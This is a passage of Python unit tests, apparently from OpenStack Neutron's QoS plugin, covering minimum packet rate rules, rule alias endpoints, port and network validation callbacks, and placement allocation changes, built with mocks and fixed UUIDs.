self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, rule_data['minimum_packet_rate_rule']['id'],
self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_update_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_update_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.delete_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, _policy.id)
def test_delete_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(
self.ctxt, id=self.min_pps_rule.id)
def test_get_policy_min_pps_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_min_pps_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rules,
self.ctxt, self.policy.id)
def test_get_min_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'min_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
self.assertEqual(
qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_min_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
class QoSRuleAliasTestExtensionManager(object):
def get_resources(self):
return qos_rules_alias.Qos_rules_alias.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class QoSRuleAliasMinimumPacketRateTestExtensionManager(object):
def get_resources(self):
return qos_pps_minimum_rule_alias.Qos_pps_minimum_rule_alias.\
get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestQoSRuleAlias(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'bandwidth_limit': rule_object.QosBandwidthLimitRule,
'dscp_marking': rule_object.QosDscpMarkingRule,
'minimum_bandwidth': rule_object.QosMinimumBandwidthRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'bandwidth_limit_rule': {'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'dscp_mark': 16},
'minimum_bandwidth_rule': {'min_kbps': 10}
}
def _update_rule(self, rule_type, rule_id, **kwargs):
data = {'alias_%s_rule' % rule_type: kwargs}
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_update_request(resource, data, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _show_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _delete_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_delete_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
@mock.patch.object(qos_plugin.QoSPlugin, "update_policy_rule")
def test_update_rule(self, update_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._update_rule(rule_type, rule_id, **data)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id, {rule_data_name: data}))
update_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "get_policy_rule")
def test_show_rule(self, get_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=rule):
self._show_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
get_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "delete_policy_rule")
def test_delete_rule(self, delete_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._delete_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
delete_policy_rule_mock.assert_has_calls(calls, any_order=True)
def test_show_non_existing_rule(self):
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=None):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPNotFound.code, res.status_int)
class TestQoSRuleAliasMinimumPacketRate(TestQoSRuleAlias):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasMinimumPacketRateTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'minimum_packet_rate': rule_object.QosMinimumPacketRateRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'minimum_packet_rate_rule': {'min_kpps': 10, 'direction': 'any'}
}
class TestQosPluginDB(base.BaseQosTestCase):
PORT_ID = 'f02f160e-1612-11ec-b2b8-bf60ab98186c'
QOS_MIN_BW_RULE_ID = '8bf8eb46-160e-11ec-8024-9f96be32099d'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 8bf8eb46-160e-11ec-8024-9f96be32099d
MIN_BW_REQUEST_GROUP_UUID = 'c8bc1b27-59a1-5135-aa33-aeecad6093f4'
MIN_BW_RP = 'd7bea120-1626-11ec-9148-c32debfcf0f6'
QOS_MIN_PPS_RULE_ID = '6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb
MIN_PPS_REQUEST_GROUP_UUID = '995008f4-f120-547a-b051-428b89076067'
MIN_PPS_RP = 'e16161f4-1626-11ec-a5a2-1fc9396e27cc'
def setUp(self):
super(TestQosPluginDB, self).setUp()
self.setup_coreplugin(load_plugins=False)
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.context = context.get_admin_context()
self.project_id = uuidutils.generate_uuid()
def _make_qos_policy(self):
qos_policy = policy_object.QosPolicy(
self.context, project_id=self.project_id, shared=False,
is_default=False)
qos_policy.create()
return qos_policy
def _make_qos_minbw_rule(self, policy_id, direction='ingress',
min_kbps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumBandwidthRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kbps=min_kbps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_qos_minpps_rule(self, policy_id, direction='ingress',
min_kpps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumPacketRateRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kpps=min_kpps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_port(self, network_id, qos_policy_id=None, port_id=None,
qos_network_policy_id=None, device_owner=None):
port_id = port_id if port_id else uuidutils.generate_uuid()
base_mac = ['aa', 'bb', 'cc', 'dd', 'ee', 'ff']
mac = netaddr.EUI(next(net_utils.random_mac_generator(base_mac)))
device_owner = device_owner if device_owner else '3'
port = ports_object.Port(
self.context, network_id=network_id, device_owner=device_owner,
project_id=self.project_id, admin_state_up=True, status='DOWN',
device_id='2', qos_policy_id=qos_policy_id,
qos_network_policy_id=qos_network_policy_id, mac_address=mac,
id=port_id)
port.create()
return port
def _make_network(self, qos_policy_id=None):
network = network_object.Network(self.context,
qos_policy_id=qos_policy_id)
network.create()
return network
def _test_validate_create_network_callback(self, network_qos=False):
net_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
kwargs = {"context": self.context,
"network": network}
with mock.patch.object(self.qos_plugin,
'validate_policy_for_network') \
as mock_validate_policy:
self.qos_plugin._validate_create_network_callback(
"NETWORK", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context, resource_id=kwargs['network']['id'],))
qos_policy = None
if network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, network.id)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_network_callback(self):
self._test_validate_create_network_callback(network_qos=True)
def test_validate_create_network_callback_no_qos(self):
self._test_validate_create_network_callback(network_qos=False)
def _test_validate_create_port_callback(self, port_qos=False,
network_qos=False):
net_qos_obj = self._make_qos_policy()
port_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
port_qos_id = port_qos_obj.id if port_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
port = self._make_port(network.id, qos_policy_id=port_qos_id)
kwargs = {"context": self.context,
"port": {"id": port.id}}
with mock.patch.object(self.qos_plugin, 'validate_policy_for_port') \
as mock_validate_policy:
self.qos_plugin._validate_create_port_callback(
"PORT", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context,
resource_id=kwargs['port']['id'],))
qos_policy = None
if port_qos:
qos_policy = port_qos_obj
elif network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, port)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_port_callback_policy_on_port(self):
self._test_validate_create_port_callback(port_qos=True)
def test_validate_create_port_callback_policy_on_port_and_network(self):
self._test_validate_create_port_callback(port_qos=True,
network_qos=True)
def test_validate_create_port_callback_policy_on_network(self):
self._test_validate_create_port_callback(network_qos=True)
def test_validate_create_port_callback_no_policy(self):
self._test_validate_create_port_callback()
def _prepare_for_port_placement_allocation_change(self, qos1, qos2,
qos_network_policy=None):
qos1_id = qos1.id if qos1 else None
qos2_id = qos2.id if qos2 else None
qos_network_policy_id = (
qos_network_policy.id if qos_network_policy else None)
network = self._make_network(qos_policy_id=qos_network_policy_id)
port = self._make_port(
network.id, qos_policy_id=qos1_id, port_id=TestQosPluginDB.PORT_ID)
return {"context": self.context,
"original_port": {
"id": port.id,
"device_owner": "compute:uu:id",
"qos_policy_id": qos1_id,
"qos_network_policy_id": qos_network_policy_id},
"port": {"id": port.id, "qos_policy_id": qos2_id}}
def test_check_port_for_placement_allocation_change_no_qos_change(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos1_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change(self):
qos1_obj = self._make_qos_policy()
qos2_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos2_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, qos2_obj, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_new_policy(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, None, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_qos_update(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
kwargs['port'].pop('qos_policy_id')
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change_qos_network_policy(
self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=None, qos2=desired_qos, qos_network_policy=qos_network)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos_network, desired_qos, kwargs['original_port'], port)
def test_check_network_for_placement_allocation_change_no_qos_change(self):
qos1 = self._make_qos_policy()
original_network = self._make_network(qos1.id)
network = original_network
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_no_ports_to_update(
self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
port_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
# Port which is not compute bound
self._make_port(network_id=network.id, qos_policy_id=None,
device_owner='uu:id')
# Port with overwritten QoS policy
self._make_port(network_id=network.id, qos_policy_id=port_qos.id,
device_owner='compute:uu:id')
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_remove_qos(self):
original_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network()
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type',
profile={'allocation': 'fake_allocation'})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 1)
mock_alloc_change_calls = [
mock.call(
original_qos,
None,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': None},
mock.ANY),
]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
self.assertDictEqual(port1.bindings[0].profile, {})
def test_check_network_for_placement_allocation_change(self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
port2 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port2_binding = ports_object.PortBinding(
self.context, port_id=port2.id, host='fake_host2',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port2_binding.create()
port2.bindings = [port2_binding]
port2.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {'allocation': 'fake_allocation'}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 2)
mock_alloc_change_calls = [
mock.call(
original_qos,
qos,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY),
mock.call(
original_qos,
qos,
{'id': port2.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY)]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
port2.update()
self.assertDictEqual(
port1.bindings[0].profile, {'allocation': 'fake_allocation'})
self.assertDictEqual(
port2.bindings[0].profile, {'allocation': 'fake_allocation'})
def _prepare_port_for_placement_allocation(self, original_qos,
desired_qos=None,
qos_network_policy=None,
original_min_kbps=None,
desired_min_kbps=None,
original_min_kpps=None,
desired_min_kpps=None,
is_sriov=False):
kwargs = self._prepare_for_port_placement_allocation_change(
original_qos, desired_qos, qos_network_policy=qos_network_policy)
orig_port = kwargs['original_port']
qos = original_qos or qos_network_policy
qos.rules = []
allocation = {}
if original_min_kbps:
qos.rules += [self._make_qos_minbw_rule(
qos.id, min_kbps=original_min_kbps,
rule_id=TestQosPluginDB.QOS_MIN_BW_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_BW_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_BW_RP})
if original_min_kpps:
qos.rules += [self._make_qos_minpps_rule(
qos.id, min_kpps=original_min_kpps,
rule_id=TestQosPluginDB.QOS_MIN_PPS_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_PPS_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_PPS_RP})
if desired_qos:
desired_qos.rules = []
if desired_min_kbps:
desired_qos.rules += [self._make_qos_minbw_rule(
desired_qos.id, min_kbps=desired_min_kbps)]
if desired_min_kpps:
desired_qos.rules += [self._make_qos_minpps_rule(
desired_qos.id, min_kpps=desired_min_kpps)]
binding_prof = {}
if is_sriov:
binding_prof = {
'pci_slot': '0000:42:41.0',
'pci_vendor_info': '8086:107ed',
'physical_network': 'sriov_phy'
}
binding_prof.update({'allocation': allocation})
orig_port.update(
{'binding:profile': binding_prof,
'device_id': 'uu:id'}
)
return orig_port, kwargs['port']
def _assert_pci_info(self, port):
self.assertIn('pci_slot', port['binding:profile'])
self.assertIn('pci_vendor_info', port['binding:profile'])
self.assertIn('physical_network', port['binding:profile'])
def test_change_placement_allocation_increase(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps_and_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500},
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
def test_change_placement_allocation_change_direction_min_pps_and_min_bw(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'egress'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -500,
'NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC': 1000},
self.MIN_BW_RP: {
'NET_BW_IGR_KILOBIT_PER_SEC': -1000,
'NET_BW_EGR_KILOBIT_PER_SEC': 2000}})
def test_change_placement_allocation_change_dir_min_pps_ingress_to_any(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'any'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.assertRaises(NotImplementedError,
self.qos_plugin._change_placement_allocation, qos1, qos2,
orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement_with_pps(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000, original_min_kpps=500,
desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
